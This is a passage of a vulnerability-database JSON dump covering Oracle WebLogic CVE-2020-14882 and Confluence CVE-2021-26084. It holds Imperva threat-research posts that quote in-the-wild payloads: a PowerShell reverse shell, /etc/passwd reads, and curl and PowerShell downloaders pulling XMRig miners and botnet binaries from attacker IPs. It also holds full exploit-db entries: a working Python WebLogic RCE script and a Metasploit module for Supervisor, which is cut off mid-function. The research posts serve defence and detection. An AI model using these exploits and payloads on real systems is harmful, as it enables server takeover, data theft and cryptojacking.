"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2020-11-02T17:46:12", "id": "MALWAREBYTES:813434778D13E29E56560316C9FCD816", "href": "https://blog.malwarebytes.com/malwarebytes-news/2020/11/a-week-in-security-october-26-november-1/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2020-11-04T08:16:24", "description": "## Introduction\n\nPopular within the commercial sphere, Oracle WebLogic Server is a scalable enterprise Java platform application server for Java-based web applications. When a vulnerability is discovered in WebLogic, hackers will try to exploit it ASAP. \nAnd it\u2019s not only hackers - bug hunters also want to make a quick buck and report the organization\u2019s vulnerability.\n\n## Oracle WebLogic Unauthenticated Complete Takeover RCE (CVE-2020\u201314882)\n\nThis vulnerability is an unauthenticated Remote Code Execution (RCE), which means you need to send a single HTTP request to the vulnerable WebLogic server to exploit it, and you don\u2019t need to be authenticated to take control of the server.\n\nA [video](<https://www.youtube.com/watch?v=JFVDOIL0YtA>) showing the Proof Of Concept (POC) was released on October 28, 2020, and a detailed report of the vulnerability was published on [Medium](<https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf>) on the same day.\n\n## Bug hunters\n\nNowadays, hunting for bugs and earning money is a common practice. \nTo make their job easier, bug hunters create many tools and automated scanning systems to find and exploit bugs - allowing them to be the first to find the bug and earn money. \nThese automated systems are an orchestration of multiple tools. \nThe outcome of the scans the perform is information about a company - information on the domains, sub-domains, technological stack, IPs, and more that\u2019s stored in databases. \n\nWhen a new vulnerability, like WebLogic RCE, is discovered, the bug hunter can pull all the domains that run WebLogic and try to exploit it with a push of a button.\n\n\u201cNuclei\u201d is one of these tools - a highly customizable tool that allows you to identify vulnerabilities and exploit them using pre-defined [templates](<https://github.com/projectdiscovery/nuclei-templates>). \nWith this tool, you can attack multiple targets at once, thereby increasing your chances of success. \nThese templates contain all the data needed to exploit a specific vulnerability, such as URL, parameters, and payloads. \nYou can find many templates added by the community in the GitHub repository, but you can also create your templates.\n\n## Exploitation\n\nWhen this kind of vulnerability is published, hackers don\u2019t waste time and will try to exploit it before the vendor and associated companies apply a patch. \nAt Imperva, we have built-in security mechanisms to protect against zero-day attacks, including RCE, on different platforms. \nWhen CVE-2020\u201314882 was published, we searched our data to find exploitation attempts, and found the following: \nThe first exploitation attempt was made on October 28, the same day the POC was published. \nThe attempt was made by the above-mentioned tools as well as a very popular tool in the bug bounty community, [Nuclei](<https://github.com/projectdiscovery/nuclei>). \n\nThe template to exploit CVE-2020-14882 was uploaded on the public \u201cNuclei\u201d template repository on October 29, a day after we saw the first exploitation attempt using \u201cNuclei\u201d.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/11/unnamed.png>) \n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/11/pasted-image-0.png>)\n\nOn October 28, we saw many user-agents, indicating the bug hunter had carried out the exploitation:\n\n * Nuclei - Open-source project (github.com/projectdiscovery/nuclei)\n * Bug Bounty\n * Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36 -- [ethical-bugbot]@protonmail.com\n * Fuzz Faster U Fool v1.2.0-git\n * httpx - Open-source project (github.com/projectdiscovery/httpx)\n\nAll these user-agents are related to tools used by bug hunters.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/11/imageLikeEmbed.png>)\n\nMany of the exploitation attempts were carried out by Golang-based tools. \nFor example, \u201cNuclei\u201d, \u201cFuzz Faster U\u201d and \u201chttpx\u201d are all written in Golang and used by the bug bounty community.\n\n## Types of payloads observed\n\n### Information disclosure\n\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('type C:\\Windows\\win.ini');")\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('cat /etc/passwd');")\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ls');")`\n\n### Reconnaissance / probing\n\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('nslookup xxxxxx.d.requestbin.net');");\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl hxxp://xxxxxxxx.ceye.io');");\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('nslookup xxxxxxxxx.0efp3gmy20ijk3tx20mqollbd2jtfh4.burpcollaborator.net')")\n * com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://xx.xx.xx.xxx:xxxxx")\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ping.exe -n xxxxxxxxx.burpcollaborator.net');");\n\n### Backdoors\n\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec("powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient("xxx.xx.xxx.xxx",1447);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>\n\n### Malware\n\n * com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('powershell -Command (New-Object System.Net.WebClient).DownloadFile('hxxp:/x.x.x.x.xmring.com/update.exe','update.exe');(New-Object -com Shell.Application).ShellExecute('update.exe');');");\n\nHackers and bug hunters use a very common method - \u201cspray and pray\u201d. They send exploits to multiple targets in a hope that one of the systems is vulnerable and it will trigger the payload. \nThe payload used is an out-of-band communication channel like DNS and HTTP. \nIn the payload, you can see the use of \u201cburp collaborator\u201d and \u201crequestbin.net\u201d. \nBoth services allow receiving a DNS query triggered by the payload.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/11/oob_weblogic_blured.jpg>)\n\n## Conclusion\n\nIt\u2019s not only malicious actors that try to exploit vulnerabilities - but also people who want to make companies more secure. \nWe\u2019re constantly on the lookout for new vulnerabilities to make sure our customers are protected. \nImperva WAF has different security mechanisms to detect zero-day attacks. In the case of WebLogic RCE CVE-2020\u201314882, the attacks were detected and blocked out of the box.\n\nThe post [Bug hunting for a quick buck using WebLogic vulnerability (CVE-2020\u201314882)](<https://www.imperva.com/blog/bug-hunting-for-a-quick-buck-using-weblogic-vulnerability-cve-2020-14882/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-02T15:47:04", "type": "impervablog", "title": "Bug hunting for a quick buck using WebLogic vulnerability (CVE-2020\u201314882)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2020-11-02T15:47:04", "id": "IMPERVABLOG:1DB28979DC434D618FB773C7834FB207", "href": "https://www.imperva.com/blog/bug-hunting-for-a-quick-buck-using-weblogic-vulnerability-cve-2020-14882/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-13T20:35:04", "description": "## Vulnerability Overview\n\nOn August 25, 2021 [a security advisory was released](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) for a vulnerability identified in Confluence Server titled \u201cCVE-2021-26084: Atlassian Confluence OGNL Injection\u201d.\n\nThe vulnerability allows an unauthenticated attacker to perform remote command execution by taking advantage of an insecure handling of OGNL (Object-Graph Navigation Language) on affected Confluence servers.\n\nSoon after the publication, various POC/Exploits were published online - at the time of writing this blog there are 32 Github repositories available for CVE-2021-26084.\n\nBesides the publicly available exploits (attempts at executing them were already detected on our systems), Imperva security researchers were able to identify attackers\u2019 attempts to exploit this vulnerability in order to install and run the XMRig cryptocurrency miner on affected Confluence servers running on Windows and Linux systems.\n\n## Analysis\n\n### Attacker Methodology\n\nAs mentioned above we were able to detect payloads targeting Windows and Linux Confluence servers.\n\nIn both cases, the attacker is using the same methodology in exploiting a vulnerable Confluence Server.\n\n * Attacker determines the target operating system and downloads Linux Shell/Windows Powershell dropper scripts from a remote C&C server, and writes them into a writable location on the affected system (under /tmp on Linux and $env:TMP system variable on Windows).\n * Executing downloaded dropper scripts.\n * Dropper Scripts perform the following actions to download, install and execute the XMRig crypto mining files: \n * Removal of competing crypto mining processes and their related files.\n * Establishing persistence by adding a crontab/scheduled task based on the operating system.\n * Download of the XMRig crypto mining files and post-exploitation clean up scripts. The files are written to temporary locations, masked as legitimate services/executables.\n * Starting XMRig mining.\n * Execution of post-exploitation scripts.\n\n### Downloaded Dropper Scripts\n\nThe following malicious payload was observed on our monitoring systems: \nqueryString=aaaaaaaa'+{Class.forName('javax.script.ScriptEngineManager') .newInstance().getEngineByName('JavaScript').eval('var isWin = \njava.lang.System.getProperty("os.name").toLowerCase().contains("win"); \nvar cmd = new java.lang.String("curl -fsSL \nhxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg");var p = new \njava.lang.ProcessBuilder(); if(isWin){p.command("cmd.exe", "/c", cmd); \n} else{p.command("bash", "-c", cmd); }p.redirectErrorStream(true); var \nprocess= p.start(); var inputStreamReader = new \njava.io.InputStreamReader(process.getInputStream()); \nvar bufferedReader = new java.io.BufferedReader(inputStreamReader); var \nline = ""; var output = ""; while((line = bufferedReader.readLine()) \n!= null){output = output + line + java.lang.Character.toString(10); \n}')}+'\n\nFrom the sample above we see the attacker is attempting to determine the vulnerable server operating system by calling java.lang.System.getProperty("os.name"):\n\nOnce the operating system is determined, a file is downloaded from a remote source by either using curl as can be seen in the example above or by powershell:\n\nDownload of a Linux Shell dropper script: \nvar cmd = new java.lang.String("**curl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg**");\n\nDownload of a Windows Powershell dropper script: \nvar cmd = new java.lang.String(**"powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC \n4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAo \nACcAaAB0AHQAcAA6AC8ALwAyADcALgAxAC4AMQAuADMANAA6ADgAMAA4ADAALwBkAG8AYw \nBzAC8AcwAvAHMAeQBzAC4AcABzADEAJwApAA=="**);\n\nThe powershell payload is base64 encoded, thus decoded into the following code which downloads the sys.ps1 file: \nIEX (New-Object System.Net.Webclient).DownloadString('[hxxp://27.1.1.34:8080/docs/s/sys.ps1](<8080/docs/s/sys.ps1>)')\n\nShell Dropper scripts: \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/26084.txt](<http://27.1.1.34:8080/docs/s/26084.txt>) -o /tmp/.solrg \nPost-exploitation linked clean up scripts that remove all traces of the dropper script mentioned above: \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/kg.txt](<8080/docs/s/kg.txt>) -o /tmp/.solrx \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/kk.txt](<8080/docs/s/kk.txt>) -o /tmp/.solrx \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/kill.sh](<8080/docs/s/kk.txt>) -o /tmp/.{random_string}\n\n### Executing Downloaded Dropper Scripts\n\nThe downloaded dropper scripts are executed using the similar payload found in the vulnerable querystring parameter shown above.\n\nBelow is one example where again the attacker is using different code execution command based on the affected server operating system detected: \nqueryString=aaaaaaaa'+{Class.forName('javax.script.ScriptEngineManager \n').newInstance().getEngineByName('JavaScript').eval('var isWin = \njava.lang.System.getProperty("os.name").toLowerCase().contains("win"); \n**var cmd = new java.lang.String("bash /tmp/.solrg**");var p = new \njava.lang.ProcessBuilder(); if(isWin){p.command("cmd.exe", "/c", cmd); \n} else{p.command("bash", "-c", cmd); }p.redirectErrorStream(true); var \nprocess= p.start(); var inputStreamReader = new \njava.io.InputStreamReader(process.getInputStream()); var \nbufferedReader = new java.io.BufferedReader(inputStreamReader); var \nline = ""; var output = ""; while((line = bufferedReader.readLine()) \n!= null){output = output + line + java.lang.Character.toString(10); \n}')}+'\n\n### Dropper Script Analysis\n\nAs mentioned earlier, the first part of the dropper scripts are performing the removal of competing crypto mining processes and their related files.\n\nOn Linux systems:\n\nOn Windows systems:\n\nIn the next step, the script establishes persistence by adding a crontab/scheduled task, and downloads additional files from publicly available platforms that can sometimes host malwares (pastebin).\n\nOn Linux systems:\n\nOn Windows systems:\n\nThe script then finally downloads the XMRig cryptocurrency miner files.\n\nThe files are then written to temporary locations, masked as legitimate services/executables.\n\nAnd finally, the script starting the XMRig mining and execution of post-exploitation scripts is done separately.\n\nThe set of actions described above is executed differently based on the target operating system.\n\nOn Linux systems:\n\nDownloaded XMRig cryptocurrency miner files: \ncurl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json -o /tmp/.solr/config.json - Miner Config file \ncurl -fsSL hxxp://222[.]122[.]47[.]27[:]2143/auth/solrd.exe -o /tmp/.solr/solrd - XMRig Miner \ncurl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/solr.sh -o /tmp/.solr/solr.sh - XMRig Miner starter script\n\nThe script then executes the solr.sh miner starter script which in turn executes solrd, which is the XMRig Miner file that starts the mining process.\n\nOn Windows systems: \nFirst some variables are set, followed by a custom function (function Update($url,$path,$proc_name) that performs file downloads using the WebClient.DownloadFile Method using a System.Net.WebClient object, \nwhich is used later in the script:\n\nXMRig miner executable, miner name and path: \n$miner_url = "hxxp://222[.]122[.]47[.]27[:]2143/auth/xmrig.exe" \n$miner_name = "javae" \n$miner_path = "$env:TMP\\javae.exe" \n\n\nMiner configuration file, name and path: \n$miner_cfg_url = "hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json" \n$miner_cfg_name = "config.json" \n$miner_cfg_path = "$env:TMP\\config.json" \n\n\nClean-up batch script (clean.bat), name and path: \n$killmodule_url = "hxxp://27[.]1[.]1[.]34[:]8080/examples/clean.bat" \n$killmodule_name = "clean.bat" \n$killmodule_path = "$env:TMP\\clean.bat" \n\n\nAfter the script variables are set, the script then performs the following actions:\n\nClears the System File, Hidden File and Read-Only attributes for any previously installed miner configuration files (config.json), and deletes their relevant files and folders. \nUsing the custom Update function, it downloads the miner executable and config files by passing the variables set earlier to the said function. \nNext it sets the System File, Hidden File and Read-Only attributes for the newly downloaded miner files, and starts the miner process.\n\nLast step is executing the clean-up batch script, and termination of the powershell.exe process.\n\n### Attacker Origin\n\nThe threat actors\u2019 TTP (tactics, techniques, procedures) aren\u2019t new and we\u2019ve seen similar attack campaigns in the past. Based on the data we observed including downloaders, payloads, configuration, C&C servers and more, we identified a known threat actor that is tied to previous attack campaigns going back as far as March 2021.\n\nThe C&C 27[.]1[.]1[.]34[:]8080 has been previously associated with the z0Miner botnet. \nz0Miner is a malicious mining family that became active last year and has been publicly analyzed by the [Tencent Security Team](<https://s.tencent.com/research/report/1170.html>).\n\nIt was found that the attackers exploited two Oracle Weblogic RCE vulnerabilities (CVE-2020-14882 and CVE-2020-14883), which used the same methodology as mentioned earlier to install XMRig crypto miners on affected systems.\n\nIn past cases it was found that the same botnet was exploiting an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE impacting Jenkins servers, using the same methodology.\n\nOur findings lead us to believe that the same z0Miner botnet is actively exploiting CVE-2021-26084 for XMRig crypto mining.\n\n### Other Identified Payloads\n\nOther payloads were observed on our monitoring systems attempting to exploit CVE-2021-26084, and were identified as:\n\nMuhstik IOT Botnet activity \ncurl -s 194[.]31[.]52[.]174/conf2||wget -qO - \n194[.]31[.]52[.]174/conf2\n\nThe following research was conducted about this identified bot activity:\n\n> [Muhstik Takes Aim at Confluence CVE 2021-26084](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>)\n\nVirusTotal identified the following payloads as:\n\nBillGates Botnet \ncurl -O hxxp://213[.]202[.]230[.]103/syna;wget \nhxxp://213[.]202[.]230[.]103/syna\n\nDofloo Trojan \ncurl -O hxxp://213[.]202[.]230[.]103/quu;wget \nhxxp://213[.]202[.]230[.]103/quu\n\n## Summary\n\nAs is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain. RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing crypto currency miners and masking their activity, thus abusing the processing resources of the target.\n\nOnce CVE-2021-26084 publicly published, the Imperva Threat Research team immediately began their research on creating a mitigation. It was soon found out that protection against the vulnerability was already provided Out-Of-The-Box.\n\nThe post [Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-13T14:57:52", "type": "impervablog", "title": "Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1427", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-09-13T14:57:52", "id": "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "href": "https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-09-18T10:52:50", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T00:00:00", "type": "exploitdb", "title": "WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2020-10-29T00:00:00", "id": "EDB-ID:48971", "href": "https://www.exploit-db.com/exploits/48971", "sourceData": "#!/usr/bin/python3\r\n\r\n# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request\r\n# Exploit Author: Nguyen Jang\r\n# CVE: CVE-2020-14882\r\n# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html\r\n# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html\r\n\r\n# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf\r\n\r\nimport requests\r\nimport sys\r\n\r\nfrom urllib3.exceptions import InsecureRequestWarning\r\n\r\nif len(sys.argv) != 3:\r\n print(\"[+] WebLogic Unauthenticated RCE via GET request\")\r\n print(\"[+] Usage : python3 exploit.py http(s)://target:7001 command\")\r\n print(\"[+] Example1 : python3 exploit.py http(s)://target:7001 \\\"nslookup your_Domain\\\"\")\r\n print(\"[+] Example2 : python3 exploit.py http(s)://target:7001 \\\"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\\\"\")\r\n exit()\r\n\r\ntarget = sys.argv[1]\r\ncommand = sys.argv[2]\r\n\r\nrequest = requests.session()\r\nheaders = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}\r\n\r\nprint(\"[+] Sending GET Request ....\")\r\n\r\nGET_Request = request.get(target + \"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"java.lang.Runtime.getRuntime().exec('\" + command + \"');\\\");\", verify=False, headers=headers)\r\n\r\nprint(\"[+] Done !!\")", "sourceHref": "https://www.exploit-db.com/raw/48971", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-25T21:05:00", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-25T00:00:00", "type": "exploitdb", "title": "Supervisor 3.0a1 < 3.3.2 - XML-RPC (Authenticated) Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2017-11610", "CVE-2017-11610"], "modified": "2017-09-25T00:00:00", "id": "EDB-ID:42779", "href": "https://www.exploit-db.com/exploits/42779", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Supervisor XML-RPC Authenticated Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the Supervisor process control software, where an authenticated client\r\n can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.\r\n The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this\r\n may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been\r\n configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Calum Hutton <c.e.hutton@gmx.com>'\r\n ],\r\n 'References' =>\r\n [\r\n ['URL', 'https://github.com/Supervisor/supervisor/issues/964'],\r\n ['URL', 'https://www.debian.org/security/2017/dsa-3942'],\r\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'],\r\n ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],\r\n ['CVE', '2017-11610']\r\n ],\r\n 'Platform' => 'linux',\r\n 'Targets' =>\r\n [\r\n ['3.0a1-3.3.2', {}]\r\n ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 9001,\r\n 'Payload' => 'linux/x64/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jul 19 2017',\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(9001),\r\n OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']),\r\n OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']),\r\n OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']),\r\n ]\r\n )\r\n end\r\n\r\n def check_version(version)\r\n if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def check\r\n\r\n print_status('Extracting version from web interface..')\r\n\r\n params = {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri('/')\r\n }\r\n if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?\r\n print_status(\"Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})\")\r\n params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})\r\n end\r\n res = send_request_cgi(params)\r\n\r\n if res\r\n if res.code == 200\r\n match = res.body.match(/<span>(\\d+\\.[\\dab]\\.\\d+)<\\/span>/)\r\n if match\r\n version = Gem::Version.new(match[1])\r\n if check_version(version)\r\n print_good(\"Vulnerable version found: #{version}\")\r\n return Exploit::CheckCode::Appears\r\n else\r\n print_bad(\"Version #{version} is not vulnerable\")\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n print_bad('Could not extract version number from web interface')\r\n return Exploit::CheckCode::Unknown\r\n end\r\n elsif res.code == 401\r\n print_bad(\"Authentication failed: #{res.code} response\")\r\n return Exploit::CheckCode::Safe\r\n else\r\n print_bad(\"Unexpected HTTP code: #{res.code} response\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n else\r\n print_bad('Error connecting to web interface')\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n\r\n # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server\r\n # Credit to the following urls for the os.system() payload\r\n # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610\r\n # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html\r\n xml_payload = %{<?xml version=\"1.0\"?>\r\n<methodCall>\r\n <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\r\n <params>\r\n <param>\r\n <string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 &</string>\r\n </param>\r\n </params>\r\n</methodCall>}\r\n\r\n # Send the XML-RPC payload via POST to the specified endpoint\r\n endpoint_path = target_uri.path\r\n print_status(\"Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}\")\r\n\r\n params = {\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(endpoint_path),\r\n 'ctype' => 'text/xml',\r\n 'headers' => {'Accept' => 'text/xml'},\r\n 'data' => xml_payload,\r\n 'encode_params' => false\r\n }\r\n if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?\r\n print_status(\"Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})\")\r\n params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})\r\n end\r\n return send_request_cgi(params, timeout=5)\r\n\r\n end\r\n\r\n def exploit\r\n\r\n res = execute_cmdstager(:linemax => 800)\r\n\r\n if res\r\n if res.code == 401\r\n fail_with(Failure::NoAccess, \"Authentication failed: #{res.code} response\")\r\n elsif res.code == 404\r\n fail_with(Failure::NotFound, \"Invalid XML-RPC endpoint: #{res.code} response\")\r\n else\r\n 